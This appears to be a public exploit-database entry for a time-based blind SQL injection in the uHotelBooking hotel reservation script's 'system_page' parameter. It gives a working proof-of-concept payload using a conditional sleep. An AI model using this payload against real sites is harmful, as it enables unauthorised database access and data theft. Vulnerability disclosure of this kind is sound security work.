uHotelBooking System SQL Injection

2019.03.22
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: uHotelBooking System - 'system_page' SQL Injection # Date: 21.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.hotel-booking-script.com # Demo Site: https://www.hotel-booking-script.com/demo/ # Version: Lastest # Tested on: Kali Linux # CVE: N/A # Description: uHotelBooking is a powerful hotel management and online booking/reservation site script. ----- PoC: SQLi ----- Request: http://localhost/[PATH]/index.php Vulnerable Parameter: system_page (GET) Attack Pattern: http://locahost/[PATH]/index.php?page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top